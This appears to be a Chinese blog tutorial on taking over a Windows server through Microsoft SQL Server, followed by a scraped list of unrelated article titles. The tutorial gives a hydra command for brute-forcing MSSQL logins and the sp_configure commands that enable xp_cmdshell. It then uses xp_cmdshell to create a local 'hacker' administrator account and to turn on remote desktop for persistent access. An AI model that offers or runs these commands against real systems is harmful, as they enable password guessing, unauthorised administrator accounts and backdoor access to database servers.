一、SQLServer数据库提权前提条件:

1.以管理员身份运行数据库服务

2.已经获得SQL数据库的sysadmin权限

3.可以连接数据库

二、通过存储过程进行提权

hydra工具介绍:

-L:指定用户名字典

-P:指定密码字典

-vV:输出破解到的用户名与密码

-e:ns ,n空密码;s使用密码

语法: hydra -L user.txt -P pwd.txt -vV -e ns 192.168.239.130 mssql

案例: 暴力破解MSSQL的用户名与密码:

hydra -L ./User_name/username.txt -P ./User_password/密码.txt

-vV -e ns 192.168.239.130 mssql

MSSQL的存储过程介绍:

存储过程就是在服务端书写好对应的函数功能并命名,当客户端调用该存储过程时,只需要调用其名称即可。exec 存储过程名称

MSSQL提权的关键是利用xp-cmdshell这个存储过程。默认该存储过程是不能被调用的。

开启xp_cmdshell存储过程:

exec sp_configure 'show advanced options', 1

reconfigure

exec sp_configure ‘xp_cmdshell’, 1

reconfigure

到此提权完毕!

验证提权结果:

关闭xp_cmdshell存储过程:

exec sp_configure ‘xp_cmdshell’, 0

reconfigure

exec sp_configure 'show advanced options', 0

reconfigure

利用MSSQL提权后的持续访问:

修改远程登录桌面的设置,实现远程访问数据库服务器。

1)exec xp_cmdshell 'net user hacker 123.com /add'

2)exec xp_cmdshell 'net localgroup administrators  hacker  /add'

3)打开远程桌面:

exec xp_cmdshell 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'

4)使用黑客机连接数据库服务器

SQLServer数据库漏洞相关推荐

  1. sql+php修改mysql结构,MSSQL_修改SQL-SERVER数据库表结构的SQL命令附sql命令行修改数据库,具体不废话了,请看下文代码 - phpStudy...

    修改SQL-SERVER数据库表结构的SQL命令附sql命令行修改数据库 具体不废话了,请看下文代码详细说明吧. 向表中增加一个 varchar 列: ALTER TABLE distributors ...

  2. java 清空控制台_利用原生库和JNI(Java原生接口)实现H2数据库漏洞利用

    在H2数据库引擎中获取代码执行权限的技术早已是众所周知,但有个要求就是H2能够动态编译Java代码.而本文将向大家展示以前没有公开过的利用H2的方法,并且无需使用Java编译器,即通过原生库和JNI( ...

  3. 在SQLserver数据库里设置作业的步骤

    在SQLserver数据库里设置作业(对数据库的表定期进行数据清理)的步骤 1.首先,要打开sql server代理的服务,在我的电脑,右键管理的服务打开,SQL Server 代理 (MSSQLSE ...

  4. 获取SQLServer数据库中所有表

    对于获取SQLSERVER数据库中所有表,首先第一步引有SQLDMO.dll 找到文件路径: C:\Program   Files\Microsoft   SQL   Server\80\Tools\ ...

  5. nodejs操作sqlserver数据_pyspark操作MySQL、SQLServer数据库进行数据处理操作

    欢迎访问本人的CSDN博客[Together_CZ],我是沂水寒城. https://yishuihancheng.blog.csdn.net 在大数据处理领域里面,Hadoop和spark可以说是最 ...

  6. sqlserver在linux数据备份,SQLServer数据库之sqlserver for linux自动备份数据库脚本

    本文主要向大家介绍了SQLServer数据库之sqlserver for linux自动备份数据库脚本,通过具体的内容向大家展现,希望对大家学习SQLServer数据库有所帮助. 不多说直接上脚本 # ...

  7. 简单的3个SQL视图搞定所有SqlServer数据库字典

    此文系转载,并非本人原创. 网上有很多SQL SERVER数据库字典的SQL语句,七零八落,我在工作整理了一下思路,总结SQL代码如下.数据库字典包括表结构(分2K和2005).索引和主键.外键.约束 ...

  8. SqlServer 数据库 建立子账号

    2019独角兽企业重金招聘Python工程师标准>>> 打开sqlServer数据库   点击安全性,点击登录名,可以看到现在数据库的所有子账号,右击登录名,点击新建登录名 创建登录 ...

  9. c语言 mysql_bind,C语言连接SQLSERVER数据库

    第一步:配置ODBC.在配置ODBC时有用户DSN.系统DSN.和文件DSN三种方法,为了稳妥起见,采用系统DSN. DSN的名字叫LocalServer,帐号:sa,密码123456 第二步:打开V ...

最新文章

  1. OSPF末节和完全末节实验
  2. css :hover
  3. 遍历list、set、map和array
  4. 【洛谷 P4168】[Violet]蒲公英(分块)
  5. JDK14的新特性:JFR,JMC和JFR事件流
  6. Ehab and Path-etic MEXs CodeForces - 1325C(思维+贪心)
  7. php内容缓存输出,PHP使用缓存即时输出内容(output buffering)的方法
  8. caffe 日志保存以及matlab绘制方法(windows以及ubuntu下)
  9. 用FBI通缉犯照片集,考验亚马逊人脸识别,意外发现了隐情
  10. (转)问题: Oracle Database 10g 未在当前操作系统中经过认证
  11. Git:git合并分支
  12. 堪萨斯州立大学计算机科学,堪萨斯州立大学有哪些专业?
  13. 网易企业邮箱:与POP3、WebMail相比,为什么Imap4更被接受
  14. 七层代理与四层代理区别
  15. 企鹅吞狗,狗走狐悲,狼厂危矣
  16. C#控制方块的移动windows
  17. Vue 的最大的优势是什么?
  18. 淘宝api接口系列,获取sku详细信息
  19. 阿里云计算ACA认证攻略
  20. 家庭收支记账软件--Java

热门文章

  1. 同步电路出现异步清零可以吗_异步清零和同步清零置数区别
  2. WordPress爱导航主题 1.1.3 简约大气网站导航源码网址导航源码
  3. Cypher语句总结
  4. 爬取猫眼电影TOP100榜单
  5. USB2.0端口设备静电防护方案设计压敏电阻或TVS管
  6. 突然断电对oracle的影响,Oracle数据库之由于突然断电造成oracle数据库的部分clob字段值变为(损毁)...
  7. 【ML特征工程】第 2 章 :简单数字的花式技巧
  8. CreateEvent例子
  9. 小猪博客(猪窝) -- 关注新鲜、有趣、不可思议的事物
  10. PMP计算(带例题)